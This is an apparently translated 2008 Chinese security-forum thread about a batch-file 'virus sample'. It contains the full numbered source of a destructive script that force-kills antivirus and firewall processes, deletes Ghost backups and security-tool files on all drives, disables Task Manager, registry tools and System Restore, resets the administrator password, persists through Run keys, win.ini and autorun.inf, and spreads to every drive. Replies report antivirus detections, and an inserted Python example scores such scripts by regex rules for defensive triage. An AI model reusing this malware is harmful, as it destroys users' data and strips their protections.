
[Virus sample] AV-evading batch file

yjfh
Posted on 2008-3-15 03:20:55
Antivirus software does not flag it; run with caution.

Exia (this user has been deleted)
Posted on 2008-3-15 03:26:22
Starting the file scan:

Begin scan in 'D:\测试.rar'
D:\测试.rar
  [0] Archive type: RAR
  --> ²âÊÔ.bat
      [DETECTION] Contains detection pattern of the batch virus BAT/BadGrl
      [INFO]      The file was deleted!

[ Last edited by Exia on 2008-4-27 17:24 ]

jindun
Posted on 2008-3-15 07:20:57
The OP is impressive, sharing so selflessly

to jindun: please do not post remarks that look like filler, thanks

[ Last edited by qianwenxiang on 2008-3-15 10:27 ]
kkgh
Posted on 2008-3-15 09:38:27
Rising virus scan result report

List of virus types removed:
Virus: Harm.BAT.KillAV.a

User source: Internet

Software version: 20.35.42

雨宫优子
Posted on 2008-3-15 10:32:04
The code is very old; I saw it on a batch-scripting forum before.
I even lifted part of the code once to play a prank..
ESS detects it..

[ Last edited by aarwwefdds on 2008-3-15 10:33 ]
sam.to
Posted on 2008-3-15 10:45:53
Submitted to Kaspersky
kiki
Posted on 2008-3-15 11:55:45
Generates cmd.bat
  1. @echo off
  2. title You DEAD!!!!!!!
  3. set taskkill=s
  4. copy %0 %windir%\system32\cmd.bat
  5. attrib %windir%\system32\cmd.bat +r +s +h
  6. net stop sharedaccess >nul
  7. %s% /im pfw.exe shadowtip.exe shadowservice.exe qq.exe explorer.exe IEXOLORE.EXE /f >nul
  8. %s% /im norton* /f >nul
  9. %s% /im av* /f >nul
  10. %s% /im fire* /f >nul
  11. %s% /im anti* /f >nul
  12. %s% /im spy* /f >nul
  13. %s% /im bullguard /f >nul
  14. %s% /im PersFw /f >nul
  15. %s% /im KAV* /f >nul
  16. %s% /im ZONEALARM /f >nul
  17. %s% /im ******* /f >nul
  18. %s% /im OUTPOST /f >nul
  19. %s% /im nv* /f >nul
  20. %s% /im nav* /f >nul
  21. %s% /im F-* /f >nul
  22. %s% /im ESAFE /f >nul
  23. %s% /im cle /f >nul
  24. %s% /im BLACKICE /f >nul
  25. %s% /im def* /f >nul
  26. %s% /im 360safe.exe /f >nul
  27. net stop Shadow" "System" "Service
  28. set alldrive=d e f g h i j k l m n o p q r s t u v w x y z
  29. for %%a in (c %alldrive%) do del %%a:\360* /f /s /q >nul
  30. for %%a in (c %alldrive%) do del %%a:\修复* /f /s /q >nul
  31. rem Modify the registry.......
  32. REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\Advanced\
  33. Folder\Hidden\SHOWALL /v
  34. CheckedValue /t REG_DWORD /d 00000000 /f >nul
  35. REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policie*\**plorer /v
  36. NoRun /t REG_DWORD /d
  37. 00000001 /f >nul
  38. REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policie*\**plorer /v
  39. NoRecentDocsMenu /t
  40. REG_DWORD /d 00000001 /f >nul
  41. REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policie*\**plorer /v
  42. NoDrives /t REG_DWORD /d
  43. 4294967295 /f >nul
  44. REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v
  45. Disableregistrytools /t
  46. REG_DWORD /d 00000002 /f >nul
  47. REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policie*\**plorer /v
  48. NoNetHood /t REG_DWORD /d
  49. 00000001 /f >nul
  50. REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policie*\**plorer /V
  51. NoDesktop /t REG_DWORD /d
  52. 00000001 /f >nul
  53. REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policie*\**plorer /v
  54. NoClose /t REG_DWORD /d
  55. 00000001 /f >nul
  56. REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policie*\**plorer /v
  57. NoFind /t REG_DWORD /d
  58. 00000001 /f >nul
  59. REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v
  60. DisableTaskMgr /t REG_DWORD
  61. /d 00000001 /f >nul
  62. REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policie*\**plorer /v
  63. NoLogOff /t REG_DWORD /d
  64. 00000001 /f >nul
  65. REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policie*\**plorer /v
  66. NoSetTaskBar /t REG_DWORD
  67. /d 00000001 /f >nul
  68. REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows" "NT\CurrentVersion\SystemRestore /v
  69. DisableSR /t REG_DWORD /d
  70. 00000001 /f >nul
  71. REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows" "NT\SystemRestore /v
  72. DisableConfig /t REG_DWORD /d
  73. 00000001 /f >nul
  74. REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policie*\**plorer /v
  75. RestrictRun /t REG_DWORD /d
  76. 00000001 /f >nul
  77. cls
  78. net user administrator 123456 >nul
  79. for %%c in (c %alldrive%) do del %%c:\*.gho /f /s /q >nul
  80. echo @echo off >d:\setup.bat
  81. echo shutdown -r -t 10 -f -c 亲爱的朋友,我十分抱歉的通知你,你的电脑已经严重崩溃,请重新
  82. 安装系统可以解决此问题
  83. !^.^ >>d:\setup.bat
  84. echo copy d:\setup.bat c:\Documents" "and" "Settings\All" "Users\「开始」菜单\程序\启动
  85. \a.bat >>d:\setup.bat
  86. echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v
  87. setup.bat /t REG_SZ /d d:\setup.bat
  88. /f >>d:\setup.bat
  89. echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v
  90. setup.bat /t REG_SZ /d d:\setup.bat
  91. /f >>d:\setup.bat
  92. echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce /v
  93. setup.bat /t REG_SZ /d d:\setup.bat
  94. /f >>d:\setup.bat
  95. HKEY_CLASSES_ROOT\batfile\shell\open\command /v setup.bat /t REG_SZ /d d:\setup.bat /f
  96. >>d:\setup.bat
  97. echo [windows] >> %windir%\win.ini
  98. echo run=d:\setup.bat C:\AUTOEXEC.BAT >> %windir%\win.ini
  99. echo load=d:\setup.bat C:\AUTOEXEC.BAT >> %windir%\win.ini
  100. echo [boot] >> %windir%\system.ini
  101. echo shell=explorer.exe setup.bat C:\AUTOEXEC.BAT >> %windir%\system.ini
  102. echo [AutoRun] >d:\autorun.inf
  103. echo Open=setup.bat >>d:\autorun.inf
  104. echo Open=system.bat >>d:\autorun.inf
  105. attrib d:\autorun.inf +r +s +h >>d:\setup.bat
  106. attrib d:\setup.bat +r +s +h >>d:\setup.bat
  107. start d:\setup.bat /min >nul
  108. echo @echo off >>C:\AUTOEXEC.BAT
  109. echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v
  110. AUTOEXEC.BAT /t REG_SZ /d
  111. C:\AUTOEXEC.BAT /f >>C:\AUTOEXEC.BAT
  112. echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v
  113. AUTOEXEC.BAT /t REG_SZ /d
  114. C:\AUTOEXEC.BAT /f >>C:\AUTOEXEC.BAT
  115. REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce /v
  116. AUTOEXEC.BAT /t REG_SZ /d
  117. C:\AUTOEXEC.BAT /f >>C:\AUTOEXEC.BAT
  118. echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v
  119. setup.bat /t REG_SZ /d d:\setup.bat
  120. /f >>C:\AUTOEXEC.BAT
  121. echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v
  122. setup.bat /t REG_SZ /d d:\setup.bat
  123. /f >>C:\AUTOEXEC.BAT
  124. REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce /v
  125. setup.bat /t REG_SZ /d d:\setup.bat
  126. /f >>C:\AUTOEXEC.BAT
  127. echo if not d:\setup.bat start %windir%\system32\cmd.bat /min >>C:\AUTOEXEC.BAT
  128. copy %0 %systemroot%\windows.bat >nul
  129. if not exist %windir%/system32/explorer.bat @echo off >>%windir%/system32/explorer.bat
  130. if not exist C:\AUTOEXEC.BAT start %windir%\system32\cmd.bat /min >>%
  131. windir%/system32/explorer.bat
  132. if not exist %windir%\system32\cmd.bat start %systemroot%\windows.bat /min >>%
  133. windir%/system32/explorer.bat
  134. echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v
  135. AUTOEXEC.BAT /t REG_SZ /d
  136. C:\AUTOEXEC.BAT /f >>%windir%/system32/explorer.bat
  137. echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v
  138. AUTOEXEC.BAT /t REG_SZ /d
  139. C:\AUTOEXEC.BAT /f >>%windir%/system32/explorer.bat
  140. echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v
  141. setup.bat /t REG_SZ /d d:\setup.bat
  142. /f >>%windir%/system32/explorer.bat
  143. echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v
  144. setup.bat /t REG_SZ /d d:\setup.bat
  145. /f >>%windir%/system32/explorer.bat
  146. echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v
  147. explorer.bat /t REG_SZ /d %
  148. windir%/system32/explorer.bat/f >>%windir%/system32/explorer.bat
  149. echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v
  150. explorer.bat /t REG_SZ /d %
  151. windir%/system32/explorer.bat /f >>%windir%/system32/explorer.bat
  152. echo start %systemroot%\windows.bat /min >>%windir%/system32/explorer.bat
  153. attrib %windir%/system32/explorer.bat +r +s +h%
  154. attrib %systemroot%/windows.bat +r +s +h
  155. for %%c in (%alldrive%) do echo @echo off >>%%c:\system.bat
  156. for %%c in (%alldrive%) do echo start %windir%\system32\cmd.bat /min >>%%c:\system.bat
  157. for %%c in (%alldrive%) do echo attrib system.bat +r +s +h >>%%c:\system.bat
  158. set drive=e f g h i j k l m n o p q r s t u v w x y z
  159. for %%c in (%drive%) do echo [AuroRun] >%%c:\autorun.inf
  160. for %%c in (%drive%) do echo Open=system.bat >>%%c:\autorun.inf
  161. copy %0 d:\Program" "Files\run.bat
  162. for %%c in (%alldrive%) do echo if not exist %windir%/system32/explorer.bat start
  163. d:\Program" "Files\run.bat /min
  164. >>%%c:\system.bat
  165. for %%c in (%alldrive%) do attrib autorun.inf +r +s +h >>%%c:\system.bat
  166. for %%c in (%alldrive%) do attrib %%c:\autorun.inf +r +s +h >nul
  167. for %%c in (%alldrive%) do attrib %%c:\system.bat +r +s +h >nul
  168. if not exist %windir%/system32/explorer.bat start d:\Program" "Files\run.bat
  169. /min >>d:\setup.bat
  170. attrib d:\Program" "Files\run.bat +r +s +h >nul
  171. del %0
  172. exit
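Several replies in this thread report generic KillAV-style detections for this script. The following added example (not from the thread and not any vendor's engine) shows how a static triage pass can score a batch listing on behaviours visible in the listing above; the rule names, weights, threshold and sample lines are assumptions made for illustration.

```python
import re

# Behaviour rules taken from commands visible in the listing above.
# Rule names, weights and THRESHOLD are assumptions made for this example.
RULES = {
    "force_kills_processes": (r"(?:taskkill|%\w+%)\s+/im\s+[^>]*?/f\b", 3),
    "stops_firewall_service": (r"net\s+stop\s+sharedaccess", 2),
    "policy_lockdown": (r"reg\s+add\s+[^>]*?/v\s+(?:DisableTaskMgr|"
                        r"DisableRegistryTools|NoDrives|NoRun|RestrictRun)\b", 3),
    "run_key_points_to_bat": (r"CurrentVersion\\Run(?:Once)?\s+/v[^>]*?\.bat\b", 2),
    "writes_autorun_inf": (r">\s*\S*autorun\.inf", 2),
    "hides_files": (r"attrib\s+[^>]*?\+s\s+\+h", 1),
    "self_delete": (r"\bdel\s+%0", 2),
}
THRESHOLD = 5  # one behaviour alone (e.g. a single forced taskkill) stays below this


def triage(listing: str) -> dict:
    """Score a batch listing; several independent behaviours must co-occur."""
    # Drop forum listing numbers ("12. ") and rejoin commands wrapped across lines.
    lines = [re.sub(r"^\s*\d+\.\s+", "", ln).strip() for ln in listing.splitlines()]
    text = " ".join(ln for ln in lines if ln)
    hits = {}
    for name, (pattern, _weight) in RULES.items():
        count = len(re.findall(pattern, text, re.IGNORECASE))
        if count:
            hits[name] = count
    score = sum(RULES[name][1] for name in hits)
    return {"hits": hits, "score": score,
            "verdict": "suspicious" if score >= THRESHOLD else "clean"}


# Constructed sample: a few lines in the shape of the numbered listing above.
SAMPLE = r"""
  1. @echo off
  2. net stop sharedaccess >nul
  3. %s% /im KAV* /f >nul
  4. REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v
  5. DisableTaskMgr /t REG_DWORD
  6. /d 00000001 /f >nul
  7. echo [AutoRun] >d:\autorun.inf
  8. attrib d:\autorun.inf +r +s +h >nul
  9. del %0
"""
# Constructed benign script: one forced taskkill plus a backup copy.
BENIGN = "@echo off\ntaskkill /im notepad.exe /f\nxcopy C:\\data D:\\backup /e /y\n"

if __name__ == "__main__":
    for label, script in (("sample", SAMPLE), ("benign", BENIGN)):
        print(label, triage(script))
```
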
千里同风
Posted on 2008-3-15 12:59:39
One question: can a Vista system protect itself against this kind of thing?
IllusionWing
Posted on 2008-3-15 13:49:57
Batch files are UG's strong suit...
It comes up straight away as EmuBat.KillAV.Gen
微点卫士
Posted on 2008-3-15 13:53:36
Nothing happened after running it; the system is normal